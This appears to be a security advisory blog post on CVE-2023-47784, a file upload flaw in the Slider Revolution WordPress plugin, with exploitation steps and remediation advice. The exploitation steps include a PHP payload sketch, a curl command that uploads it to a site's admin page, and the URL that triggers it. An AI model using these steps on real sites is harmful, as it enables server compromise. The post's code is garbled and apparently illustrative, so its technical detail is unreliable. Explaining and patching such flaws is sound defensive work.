A critical vulnerability has been identified in the popular WordPress plugin Slider Revolution, developed by ThemePunch OHG. This issue, assigned the CVE number CVE-2023-47784, lies in the unrestricted upload of files with dangerous types. This could lead to serious consequences such as unauthorized access to sensitive data, cross-site scripting (XSS), and potentially taking over the website. In this post, we will provide an overview of the vulnerability, its exploitation, and the necessary mitigation measures.

Affected Versions

Slider Revolution versions from n/a through 6.6.15 are vulnerable to this security flaw.

Details of the Vulnerability

The core of the vulnerability lies in how the plugin handles file uploads in the administrator dashboard. Specifically, the issue is due to insufficient validation of the user input and file type. An attacker could exploit this to upload a malicious file with a dangerous type, such as a PHP script that executes arbitrary code on the server. The affected vulnerable code snippet in Slider Revolution is:

if(isset($_FILES["file"]) && isset($_POST['folder'])) {
  $file = $uploaded_file;
  ...
  $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
  ...
  if(in_array($ext, $allowed_exstensions)) { // (*)
    move_uploaded_file($_FILES["file"]["tmp_name"], $new_filename);
    ...
  }
}

The code snippet above checks if the uploaded file's extension is within a list of allowed extensions. However, the list of allowed extensions is not sufficiently restrictive, allowing adversaries to upload files with dangerous extensions.

To exploit this vulnerability, an attacker would need to perform the following steps

1. Craft a malicious file with a dangerous extension, such as a .php file containing arbitrary code execution statements. For example:

echo "Hacked by " . htmlspecialchars($_GET['name']) . "!";

?>

`

2. Send a specially crafted HTTP request to the vulnerable website with the malicious file attached. This could be achieved using tools like curl or a web browser with developer tools enabled. For instance:

`

curl -i -F "file=@payload.php" -F "folder=./" "https://example.com/wp-admin/admin.php?page=slider-revolution-plugin"

`

3. Once the malicious file is uploaded, access the file through a web browser or other methods. In this scenario, the attacker would request the following URL:

`

https://example.com/wp-content/uploads/payload.php?name=AttackerName

References

- Slider Revolution - Official Plugin Page

- CVE-2023-47784 - NVD Entry

- Security Advisory by Plugin Developer

To remediate this issue, follow these steps

1. Update the Slider Revolution plugin to version 6.6.16 or later as this version contains the necessary security fixes. You can find the latest version here.

2. Ensure that your website does not have any previously uploaded dangerous file types, such as PHP or JavaScript files, within the 'wp-content/uploads/' directory. Scan your website and server for any signs of unauthorized access or malicious activity.

3. Implement regular security audits and updates to all your website's plugins and themes. This will significantly reduce your exposure to known vulnerabilities and help safeguard your website against potential attacks.

By applying these measures, you can effectively protect your WordPress site from the CVE-2023-47784 vulnerability and similar security threats in the future.

Timeline

Published on: 12/20/2023 19:15:10 UTC
Last modified on: 12/27/2023 20:05:27 UTC